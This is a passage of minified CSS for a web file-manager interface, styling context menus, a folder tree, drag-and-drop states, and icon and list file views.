margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;} html #body .menu-left .setting a, html body .menu-left .setting a{ text-indent:6px;} html .file-list-list .file .filename, html #main-title .filename, html .file-list-list .file .filetime, html #main-title .filetime{ width:100px;} html .file-list-list .file .filetype, html #main-title .filetype, html .file-list-list .file .filesize, html #main-title .filesize{ width:30px;} html .topbar .content .btn-wap-menu{ display:block !important;visibility:visible !important;position:absolute;text-align:center;z-index:100;left:0;top:0;padding:0;background:rgba(0,0,0,0.05);width:45px;height:38px;line-height:40px;} html .topbar .content .btn-wap-menu i.font-icon{ padding-right:0;} html .topbar .content .top-left.collapse{ display:none;} html .topbar .content .top-left{ width:170px;height:auto;background:#fff;color:#666;position:absolute;left:45px;z-index:100;border:1px solid rgba(0,0,0,0.1);box-shadow:0 4px 30px rgba(0,0,0,0.15);} html .topbar .content .top-left .topbar-menu.title{ display:none;} html .topbar .content .top-left .topbar-menu{ float:none;border:none;} html body#page-desktop .topbar .content .btn-wap-menu{ color:#fff;} html body#page-desktop .topbar .content .top-left{ background:rgba(0,0,0,0.7);}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}.select-container{position:absolute;cursor:default;width:0px;height:0px;border:1px solid #005ec9;background-color:#63acff;z-index:1000;opacity:0.5;filter:alpha(opacity=50);}.select-container:hover{cursor:default;}.file-draging{position:absolute;left:0;top:0px;z-index:1000;pointer-events:none;opacity:0.95;}.file-draging.file-list-icon,.file-draging.file-list-list,.file-draging.file-list-split{z-index:1000;overflow:visible;}.file-draging.file-list-icon div.file,.file-draging.file-list-list div.file,.file-draging.file-list-split div.file{clear:both;position:absolute;margin:0;transition:none !important;}.file-draging.file-list-icon div.file.handle_target,.file-draging.file-list-list div.file.handle_target,.file-draging.file-list-split div.file.handle_target{z-index:999;}.draggable-dragging{z-index:9999;clear:both !important;pointer-events:none;position:absolute !important;padding:5px;opacity:0.9;filter:alpha(opacity=90);background:#4285f4;border-radius:4px;color:#fff;box-shadow:3px 5px 15px rgba(0,0,0,0.2);font-size:1.15em;}.draggable-dragging .drag-number{display:none;}.draggable-dragging span{line-height:25px;padding-left:5px;padding-right:15px;}.draggable-dragging span .font-icon{display:inline-block;width:22px;height:22px;text-align:center;line-height:22px;color:#fff;font-size:1.0em;font-weight:800;margin-right:10px;border-radius:12px;}.draggable-dragging span .bg-default{background:#b9e0ff;color:#4285f4;}.draggable-dragging span .bg-ok{background:#6ee273;}.draggable-dragging span .bg-error{background:#FB2500;}.draggable-dragging span b{padding-right:15px;}.item-file-draging{opacity:0.5;filter:alpha(opacity=50);}.selectDragDraging .file-list-icon .file-select-drag-temp{transform:scale(1.1,1.1);}.file-continer .file .filename .title.db-click-rename{cursor:text;}.file-continer .file .item-menu{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;}.file-continer .file .item-menu:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-menu:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-menu .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;padding:2px;left:5px;border-radius:50%;background:rgba(0,0,0,0.05);border:none;color:#fff;}.file-continer .file .item-select:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-select:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-select .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select:hover{color:#fff;background:rgba(0,0,0,0.2);box-shadow:none;}.file-continer .file .item-select .item-check{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;font-size:12px;text-shadow:none;}.file-continer .file .item-select .item-check:after{content:"\f00c";position:relative;top:-1px;}.file-continer .file.hover .item-menu,.file-continer .file.select .item-menu,.file-continer .file.file-select-drag-temp .item-menu{display:block;}.file-continer .file.hover .item-select,.file-continer .file.select .item-select,.file-continer .file.file-select-drag-temp .item-select{display:block;}.file-continer .file.select .item-select{color:#fff;background:#3b8cff;}.file-continer.file-list-split .file .item-menu{top:3px;right:25px;}.file-continer.file-list-split .file .item-select{top:2px;right:45px;left:auto;}.file-continer.file-list-list .file .item-menu{top:4px;right:5px;}.file-continer.file-list-list .file .item-select{top:4px;right:25px;left:auto;}.file-list-icon{padding:10px 20px 0 10px;display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;}.file-list-icon:after{width:82px;content:"";display:block;}.file-list-icon .flex-empty{width:75px;border:1px solid transparent;margin:0;margin-right:10px;margin-bottom:10px;visibility:hidden;height:0 !important;}.file-list-icon .meta-info{height:22.5px;width:22.5px;margin-right:6.75px;margin-top:-22.5px;position:absolute;right:0;}.file-list-icon .meta-info img{width:100%;height:100%;}.file-list-icon .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;width:60px;height:75px;text-decoration:none;margin:0;margin-right:10px;margin-bottom:10px;overflow:hidden;float:left;}.file-list-icon .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-icon .file.hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-icon .file .filename{width:60px;cursor:default;text-align:center;word-break:break-all;font-size:1.0em;margin:0 auto;line-height:1.5em;padding-bottom:5px;}.file-list-icon .file .filename .textarea{position:absolute;font-size:1.0em;text-align:center;margin-left:-1px;margin-top:-3px;}.file-list-icon .file .filename #pathRenameTextarea,.file-list-icon .file .filename .newfile{width:60px;padding:0px 0 4px 0;margin-top:0px;overflow-y:hidden;border:1px solid #888;font-size:1.0em;text-align:center;line-height:1.5em;position:absolute;z-index:999;margin-top:2px;border-bottom-left-radius:3px;border-bottom-right-radius:3px;}.file-list-icon .file .filename #pathRenameTextarea:focus,.file-list-icon .file .filename .newfile:focus{outline:none;}.file-list-icon .file.select,.file-list-icon .file.file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-icon .file.file-icon-edit{overflow:visible;}.file-list-icon .file.file-icon-edit .filename{position:absolute;z-index:99;}.file-list-icon .file .ico{height:60px;width:60px;padding-top:4px;text-align:center;vertical-align:middle;display:table-cell;}.file-list-icon .file .ico img{height:100% \9;max-height:100%;max-width:100%;border-radius:5px;}.file-list-icon .file .ico.picture{background:none;width:50px;padding-left:5px;}.file-list-icon .file .ico.picture img{-webkit-box-shadow:1px 1px 5px rgba(0,0,0,0.2);-moz-box-shadow:1px 1px 5px rgba(0,0,0,0.2);box-shadow:1px 1px 5px rgba(0,0,0,0.2);width:100% \9;max-width:100%;border-radius:0px;}.file-list-icon .file .ico.picture img.lazyload-ready{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;}@media screen and (max-width:100000px){div.file-list-icon div.file{ display:inline-block;max-height:152px;vertical-align:top;float:none;height:auto;}}.context-menu-item.set-file-icon-size .box-size-smallx{font-size:0.9em;}.context-menu-item.set-file-icon-size .box-size-small{font-size:1.0em;}.context-menu-item.set-file-icon-size .box-size-default{font-size:1.15em;}.context-menu-item.set-file-icon-size .box-size-big{font-size:1.25em;}.context-menu-item.set-file-icon-size .box-size-bigx{font-size:1.35em;}#list-type-header{z-index:5;position:absolute;width:100%;top:85px;}#main-title{background:#fff;border-bottom:1px solid #e3e3e3;box-shadow:0 2px 10px rgba(0,0,0,0.06);}#main-title .box-shadow(1px 2px 15px #dde) div{cursor:pointer;overflow:hidden;}#main-title div span{float:right;margin-right:8px;margin-top:0px;}#main-title .filename,#main-title .filesize,#main-title .filetype,#main-title .filetime{float:left;cursor:pointer;overflow:hidden;line-height:25px;height:25px;border-right:1px solid #eee;padding-left:10px;margin-left:-10px;font-size:1.0em;color:#448;}#main-title .filename:hover,#main-title .filesize:hover,#main-title .filetype:hover,#main-title .filetime:hover{background:#eee;}#main-title .resize{float:left;width:20px;cursor:col-resize;margin-left:-10px;height:25px;z-index:9999;position:relative;}#main-title .current{background:rgba(0,0,0,0.8);}#main-title .filename{width:250px;padding-left:20px;margin-left:0px;}#main-title .filetype{width:80px;}#main-title .filesize{width:80px;text-align:right;padding-left:0px;padding-right:10px;}#main-title .filetime{width:150px;padding-right:6px;}#main-title .filesize span{margin-right:0px;}#main-title .this{font-weight:800;background:#eee;}.file-list-list,.file-list-split{padding-top:5px;width:100%;z-index:0;}.file-list-list .file,.file-list-split .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);margin-left:10px;-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;height:25px;}.file-list-list .file .ico,.file-list-split .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-list .file2,.file-list-split .file2{background:#edf5ff;}.file-list-list .hover,.file-list-split .hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-list .select,.file-list-list .file-select-drag-temp,.file-list-split .select,.file-list-split .file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-list .select .children-more i.font-icon,.file-list-list .file-select-drag-temp .children-more i.font-icon,.file-list-split .select .children-more i.font-icon,.file-list-split .file-select-drag-temp .children-more i.font-icon{color:#63acff !important;}.file-list-list .meta-info,.file-list-split .meta-info{display:inline-block;width:15px;height:15px;padding:0;position:relative;top:6px;margin:0px 0 0 -15px;}.file-list-list .meta-info img,.file-list-split .meta-info img{width:100%;height:100%;}.file-list-list .file,.file-list-split .file{width:80%;overflow:hidden;height:27px;}.file-list-list .file .ico,.file-list-list .file .filename,.file-list-list .file .filetype,.file-list-list .file .filesize,.file-list-list .file .filetime,.file-list-list .file .children-more,.file-list-split .file .ico,.file-list-split .file .filename,.file-list-split .file .filetype,.file-list-split .file .filesize,.file-list-split .file .filetime,.file-list-split .file .children-more{float:left;line-height:28px;height:28px;font-size:1.0em;cursor:default;overflow:hidden;padding-left:15px;}.file-list-list .file .children-more,.file-list-split .file .children-more{width:20px;height:28px;text-align:center;padding-left:0px;}.file-list-list .file .children-more i.font-icon,.file-list-split .file .children-more i.font-icon{font-size:15px;color:#aaa;cursor:pointer;display:inline-block;width:20px;line-height:28px;height:28px;font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;}.file-list-list .file .children-more i.font-icon::after,.file-list-split .file .children-more i.font-icon::after{content:"\f0da";}.file-list-list .file .children-more i.font-icon.cert-open::after,.file-list-split .file .children-more i.font-icon.cert-open::after{content:"\f0d7";}.file-list-list .file .children-more i.font-icon:hover,.file-list-split .file .children-more 